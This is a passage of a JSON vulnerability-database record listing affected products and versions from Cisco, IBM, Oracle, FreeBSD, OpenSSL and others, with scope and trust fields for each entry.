        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "8.55"
      },
      {
        "model": "unified ip conference phone for third-party call control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "unified intelligence center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.4"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.0.0"
      },
      {
        "model": "common services platform collector",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.9.1"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.7"
      },
      {
        "model": "project openssl 1.0.2e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(3.10000.9)"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "project openssl 1.0.1q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.16"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment intirim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.133"
      },
      {
        "model": "telepresence sx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "anyconnect secure mobility client for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "webex meetings client hosted",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "webex meetings for wp8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.13"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-108"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.13"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(2.1)"
      },
      {
        "model": "webex meetings for wp8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6.1"
      },
      {
        "model": "physical access control gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "wide area application services",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.5.7"
      },
      {
        "model": "9.3-release-p24",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex messenger service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security privileged identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "10.1-release-p19",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "mmp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.10"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.1"
      },
      {
        "model": "prime ip express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application and content networking system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.5.41"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "10.1-release-p30",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p13",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.2.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "intelligent automation for cloud",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0.9.8"
      },
      {
        "model": "cognos business intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "edge digital media player 1.6rb4 5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "300"
      },
      {
        "model": "mds series multilayer switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "99510"
      },
      {
        "model": "abyp-10g-4sr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "9.3-release-p36",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89450"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.4.1"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20280.6"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30002.8"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.2"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.12"
      },
      {
        "model": "webex meeting center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.11"
      },
      {
        "model": "partner supporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.11"
      },
      {
        "model": "mobility services engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.0"
      },
      {
        "model": "edge digital media player",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3401.2.0.20"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "abyp-0t-4s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "spa30x series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "unified series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "78000"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.8"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4400"
      },
      {
        "model": "10.2-release-p11",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2"
      },
      {
        "model": "enterprise content management system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "42000"
      },
      {
        "model": "security access manager for web",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1.0"
      },
      {
        "model": "socialminer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "standalone rack server cimc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli netcool system service monitors fp14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "intracer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "jabber for apple ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.6.2"
      },
      {
        "model": "video surveillance series high-definition ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "40002.4.7"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.7"
      },
      {
        "model": "9.3-release-p33",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.5"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1051.07"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "84200"
      },
      {
        "model": "jabber for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ironport email security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.2"
      },
      {
        "model": "anyconnect secure mobility client for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.112"
      },
      {
        "model": "meetingplace",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "spa525g",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "mmp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.0.5"
      },
      {
        "model": "9.3-release-p41",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli netcool system service monitors fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime network registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud object store",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.8"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "cognos business intelligence fixpack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.12"
      },
      {
        "model": "commerce experience manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.1.4"
      },
      {
        "model": "telepresence sx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "enterprise content management system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.1.5"
      },
      {
        "model": "registered envelope service",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "mq appliance m2001",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "tivoli netcool system service monitors fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "cognos business intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "99710"
      },
      {
        "model": "telepresence content server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(4)"
      },
      {
        "model": "meetingplace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3104.4"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.0.2"
      },
      {
        "model": "anyconnect secure mobility client for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1870"
      },
      {
        "model": "asa cx and prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "universal small cell series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50003.5.12.21"
      },
      {
        "model": "project openssl 1.0.1m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1)"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50007.3.1"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(3)"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3.0"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "10.1-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.0"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.2"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8945"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.18-49"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1.10000.12)"
      },
      {
        "model": "mq appliance m2000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "telepresence ex series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.3"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.3"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.6"
      },
      {
        "model": "mate design",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.1"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.5"
      },
      {
        "model": "10.3-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.13-41"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "network admission control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications for microsoft lync",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.6"
      },
      {
        "model": "identity services engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.4"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "universal small cell series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70003.4.2.0"
      },
      {
        "model": "10.1-release-p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "nexus series switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "telepresence conductor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "abyp-0t-0s-4l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "unified attendant console standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.115"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.1"
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "connected grid routers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mate live",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.13"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.6)"
      },
      {
        "model": "commerce experience manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified workforce optimization sr3 es5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "unified communications manager 10.5 su3",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.9.4"
      },
      {
        "model": "abyp-2t-2s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "abyp-4tl-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "nac server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0(0.400)"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3381"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.9-34"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.3.2"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.3"
      },
      {
        "model": "abyp-4ts-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "digital media players series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "43000"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "9.3-release-p31",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3100"
      },
      {
        "model": "security proventia network active bypass 0343c3c",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "cloud manager with openstack interim fix1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "unified ip phones 9.3 sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6901"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0(0.98000.225)"
      },
      {
        "model": "prime network",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "prime performance manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux arm",
